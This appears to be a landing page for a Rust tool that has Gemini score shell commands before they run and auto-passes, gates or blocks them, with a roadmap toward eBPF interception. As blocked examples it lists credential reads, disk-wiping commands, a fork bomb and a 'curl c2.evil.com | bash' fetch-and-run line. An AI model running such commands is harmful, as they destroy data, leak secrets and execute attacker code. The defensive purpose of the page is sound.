ATC-Kernelv0.1
AI-powered pre-execution command interceptor
Analyzes every shell command before it runs and blocks threats in real time
Live Status Monitor
$ ls -la /home/userScore: 23Current Risk Level
Score History (Last 30 Commands)
Dot = current score. Color = risk level.
Session Statistics
Recent Command Log
$ cat ~/.ssh/id_rsa92$ rm -rf /tmp/cache45$ echo $PATH8Score-Based Threat Routing
Three-tier response system based on Gemini AI risk analysis
Auto-pass with logging. Normal operations within safe boundaries.
Human-in-the-loop gate. Y/N approval popup waits for user decision.
Full-screen red block overlay. Execution halted immediately.
Threat Categories
Gemini AI classifies commands into 5 threat categories with safe alternatives
Reading credentials, PII, or protected system files
cat /etc/passwdreading .ssh/id_rsaaccessing credentialsFile or resource destruction commands
rm -rf /dd if=/dev/zero of=/dev/sdaPrivilege escalation or unauthorized access attempts
sudo -iprivilege escalation chainsC2 server connections, data exfiltration, remote code execution
curl ... | bashreverse shellsC2 beaconsFork bombs, infinite loops, resource depletion
:(){ :|:& };:disk-fill loopsEvery blocked command surfaces a Safe Alternative — a concrete, safer replacement command generated by the AI.
Ratatui TUI Interface
Real-time terminal UI with 100ms tick rate rendering
Keyboard Controls
Demo Mode
Press d to run a built-in 3-step scenario:
ls /tmpAuto-passcat /etc/passwdY/N popupcurl c2.evil.com | bashBlockedTechnology Roadmap
Progressive enhancement from userspace polling to kernel-level interception
File-tail Interceptor
Polls ~/.zsh_history every 300ms via filesystem seek
Shell → ~/.zsh_history → 300ms poll → Gemini REST → score → TUIcmux SDK Integration
Local command multiplexer via PTY layer with zero-copy ring buffer
Shell → cmux SDK hook → ring-buffer → local model → score → TUIeBPF execve Kprobe
BPF program attached to execve syscall — true pre-execution gate at OS level
execve() → BPF kprobe → risk score → SIGKILL or allowtraitInterceptor Trait — Architectural Backbone
Every backend — REST API, local model, or eBPF — implements the same interface. Swapping backends requires no changes to the risk routing logic, TUI, or event pipeline.
pub trait Interceptor: Send {async fn analyze(&self, command: &str) -> Result<GeminiResponse>;}
WhyRust?
Systems-level performance with memory safety guarantees
Memory Safety
Zero-cost ownership model eliminates buffer overflows, use-after-free, and data races at compile time.
Zero-Cost Abstractions
High-level patterns compile to optimal machine code. No runtime overhead for safety guarantees.
eBPF Extensibility
Native kernel-level tracing and monitoring. Real-time syscall interception without kernel modules.